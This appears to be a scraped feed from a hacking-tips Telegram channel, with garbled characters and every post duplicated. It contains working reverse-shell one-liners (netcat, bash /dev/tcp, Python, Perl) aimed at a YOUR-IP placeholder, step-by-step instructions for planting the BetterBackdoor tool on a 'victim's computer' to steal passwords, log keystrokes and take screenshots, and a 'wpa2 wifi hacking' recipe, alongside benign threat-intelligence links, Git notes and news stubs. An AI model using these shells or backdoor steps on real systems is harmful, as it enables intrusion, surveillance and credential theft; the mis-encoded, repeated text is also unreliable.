β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Netcat FOR BEGINERS :
Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transfer it.
Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.
With this utility, you can perform some of the penetration testing steps.
This can be useful when there are no packages installed on the attacked machine (or will attract attention), there are restrictions (for example, IoT / Embedded devices), etc.
What can be done with netcat:
Scan ports;
Forward ports;
Collect service banners;
Watch listening ports (binding for reverse connection);
Download and upload files;
Display raw HTTP content;
Create a mini chat.
In general, some unix utilities can be replaced with netcat, so this tool can be thought of as a kind of harvester for performing certain tasks.
$ nc -nvlp 443
This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.
Netcat
$ nc -e / bin / sh YOUR-IP 443
In my opinion, this is the most classic example of a reverse shell, but in modern realities netcat may simply not be installed on the server.
Bash
$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1
* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc.), it does not require any additional software, but only access to the dev subsystem.
Python
$ python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" YOUR-IP ", 443 )); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([β/ bin / shβ, β- iβ]); '
* Modern distributions of Python are almost always present, and the standard library is sufficient to do the reverse linking.
Perl
$ perl -e 'use Socket; $ i = " YOUR-IP "; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (βtcpβ)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, β> & Sβ); open (STDOUT, β> & Sβ); open (STDERR, β> & Sβ); exec (β/ bin / sh -iβ); }; '
* Like Python, almost all modern Linux distributions have Perl on their system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Netcat FOR BEGINERS :
Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transfer it.
Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.
With this utility, you can perform some of the penetration testing steps.
This can be useful when there are no packages installed on the attacked machine (or will attract attention), there are restrictions (for example, IoT / Embedded devices), etc.
What can be done with netcat:
Scan ports;
Forward ports;
Collect service banners;
Watch listening ports (binding for reverse connection);
Download and upload files;
Display raw HTTP content;
Create a mini chat.
In general, some unix utilities can be replaced with netcat, so this tool can be thought of as a kind of harvester for performing certain tasks.
$ nc -nvlp 443
This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.
Netcat
$ nc -e / bin / sh YOUR-IP 443
In my opinion, this is the most classic example of a reverse shell, but in modern realities netcat may simply not be installed on the server.
Bash
$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1
* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc.), it does not require any additional software, but only access to the dev subsystem.
Python
$ python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" YOUR-IP ", 443 )); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([β/ bin / shβ, β- iβ]); '
* Modern distributions of Python are almost always present, and the standard library is sufficient to do the reverse linking.
Perl
$ perl -e 'use Socket; $ i = " YOUR-IP "; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (βtcpβ)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, β> & Sβ); open (STDOUT, β> & Sβ); open (STDERR, β> & Sβ); exec (β/ bin / sh -iβ); }; '
* Like Python, almost all modern Linux distributions have Perl on their system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Enjoy Today's list of free pro Android applications and games(Google Play) of the day is amazing.
#Updates
#Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BetterBackdoor can create and control a backdoor.
F E A T U R E S :
Execute command line commands
Run PowerShell scripts
Run DuckyScripts to input keystrokes
Exfiltrate files based on extension
Exfiltrate Microsoft Edge and WiFi Passwords
Send and receive files to the victim's computer
Run KeyLogger
Get a screenshot of the victim's computer
Get text copied to victim's clipboard
Get the contents of the victim's file (cat)
This backdoor uses a client-server socket connection for communication.
The attacker starts the server and the victim connects to that server as a client.
Once the connection is established, commands can be sent to the client to control the backdoor.
To create a backdoor, BetterBackdoor:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Download: https://github.com/ThatcherDev/
1) Create "run.jar", the backdoor jar file, and copy it to the "backdoor" directory.
2) D obavte text file containing IPv4-address of the server to the Β«run.jarΒ».
Optionally copy the Java Runtime Environment to "backdoor" and create a batch file "run.bat" to run the backdoor in the packaged Java Runtime Environment.tterBackdoor:
3) To run the backdoor on the victim's computer, transfer all files from the "backdoor" directory to the victim's computer.
4) If the JRE is packaged with a backdoor, run run.bat, otherwise run run.jar.
5) This will launch a backdoor on the victim's computer.
6) Once launched, to control the backdoor, you must go back to BetterBackdoor and run option 1 at startup, connected to the same Wi-Fi network as the victim's computer.
π¦BetterBackdoor can create and control a backdoor.
F E A T U R E S :
Execute command line commands
Run PowerShell scripts
Run DuckyScripts to input keystrokes
Exfiltrate files based on extension
Exfiltrate Microsoft Edge and WiFi Passwords
Send and receive files to the victim's computer
Run KeyLogger
Get a screenshot of the victim's computer
Get text copied to victim's clipboard
Get the contents of the victim's file (cat)
This backdoor uses a client-server socket connection for communication.
The attacker starts the server and the victim connects to that server as a client.
Once the connection is established, commands can be sent to the client to control the backdoor.
To create a backdoor, BetterBackdoor:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Download: https://github.com/ThatcherDev/
1) Create "run.jar", the backdoor jar file, and copy it to the "backdoor" directory.
2) D obavte text file containing IPv4-address of the server to the Β«run.jarΒ».
Optionally copy the Java Runtime Environment to "backdoor" and create a batch file "run.bat" to run the backdoor in the packaged Java Runtime Environment.tterBackdoor:
3) To run the backdoor on the victim's computer, transfer all files from the "backdoor" directory to the victim's computer.
4) If the JRE is packaged with a backdoor, run run.bat, otherwise run run.jar.
5) This will launch a backdoor on the victim's computer.
6) Once launched, to control the backdoor, you must go back to BetterBackdoor and run option 1 at startup, connected to the same Wi-Fi network as the victim's computer.
(don't clone our tips)β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
In Europe, Samsung is entering the 5G race to overtake Huawei, but consumers have big reservations
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
To try live streaming, Walmart partnered up with TikTok, recommending fashion designer items.
#Updates
#Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recommended free Threat intelligence and IOC resources
* [FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise
shared publicly by FireEye.
* [FireHOL IP Lists](https://iplists.firehol.org/) - Analytics for 350+ IP lists
with a focus on attacks, malware and abuse. Evolution, Changes History,
Country Maps, Age of IPs listed, Retention Policy, Overlaps.
* [HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation.
* [hpfeeds](https://github.com/rep/hpfeeds) - Honeypot feed protocol.
* [Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service.
* [InQuest REPdb](https://labs.inquest.net/repdb) - Continuous aggregation of IOCs from a variety of open reputation sources.
* [InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter.
* [Internet Storm Center (DShield)](https://isc.sans.edu/) - Diary and
* [SystemLookup](https://www.systemlookup.com/) - SystemLookup hosts a collection of lists that provide information on
the components of legitimate and potentially unwanted programs.
* [ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat
intelligence, with search.
* [threatRECON](https://threatrecon.co/) - Search for indicators, up to 1000
free per month.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recommended free Threat intelligence and IOC resources
* [FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise
shared publicly by FireEye.
* [FireHOL IP Lists](https://iplists.firehol.org/) - Analytics for 350+ IP lists
with a focus on attacks, malware and abuse. Evolution, Changes History,
Country Maps, Age of IPs listed, Retention Policy, Overlaps.
* [HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation.
* [hpfeeds](https://github.com/rep/hpfeeds) - Honeypot feed protocol.
* [Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service.
* [InQuest REPdb](https://labs.inquest.net/repdb) - Continuous aggregation of IOCs from a variety of open reputation sources.
* [InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter.
* [Internet Storm Center (DShield)](https://isc.sans.edu/) - Diary and
* [SystemLookup](https://www.systemlookup.com/) - SystemLookup hosts a collection of lists that provide information on
the components of legitimate and potentially unwanted programs.
* [ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat
intelligence, with search.
* [threatRECON](https://threatrecon.co/) - Search for indicators, up to 1000
free per month.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mandiant/iocs: FireEye Publicly Shared Indicators of Compromise (IOCs)
FireEye Publicly Shared Indicators of Compromise (IOCs) - GitHub - mandiant/iocs: FireEye Publicly Shared Indicators of Compromise (IOCs)
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
Git tips:
The hooks directory contains client or server hook scripts, which are automatically executed under specific operations.
info contains a global exclusion file, which can be ignored by the configuration file
logs save log information
The objects directory stores all data content, and the local version repository is placed
The refs directory stores a pointer (branch) to the commit object of the data
The config file contains project-specific configuration options
description is used to display the description of the warehouse
The HEAD file indicates the branch that is currently checked out
index Temporary area data
Remember: Do not manually modify the contents of the .git folder*
Work area (code editing area): represents the local development code
Temporary storage area (modification to be submitted area): represents the address of the temporary storage code of the local warehouse
Warehouse area (code storage area): representative code enters local version control
β β β Uππ»βΊπ«Δπ¬πβ β β β
Git tips:
The hooks directory contains client or server hook scripts, which are automatically executed under specific operations.
info contains a global exclusion file, which can be ignored by the configuration file
logs save log information
The objects directory stores all data content, and the local version repository is placed
The refs directory stores a pointer (branch) to the commit object of the data
The config file contains project-specific configuration options
description is used to display the description of the warehouse
The HEAD file indicates the branch that is currently checked out
index Temporary area data
Remember: Do not manually modify the contents of the .git folder*
Work area (code editing area): represents the local development code
Temporary storage area (modification to be submitted area): represents the address of the temporary storage code of the local warehouse
Warehouse area (code storage area): representative code enters local version control
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
wpa2 wifi hacking :
1)pkg update && pkg upgrade
2)pkg install bash
3) pkg install git
4) git clone https://github.com/Anonymous3-SIT/wifi-hacker
5) cd wifi-hacker
6)ls
7) bash wifi-hacker.sh
8) choose otption
β β β Uππ»βΊπ«Δπ¬πβ β β β
1)pkg update && pkg upgrade
2)pkg install bash
3) pkg install git
4) git clone https://github.com/Anonymous3-SIT/wifi-hacker
5) cd wifi-hacker
6)ls
7) bash wifi-hacker.sh
8) choose otption
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
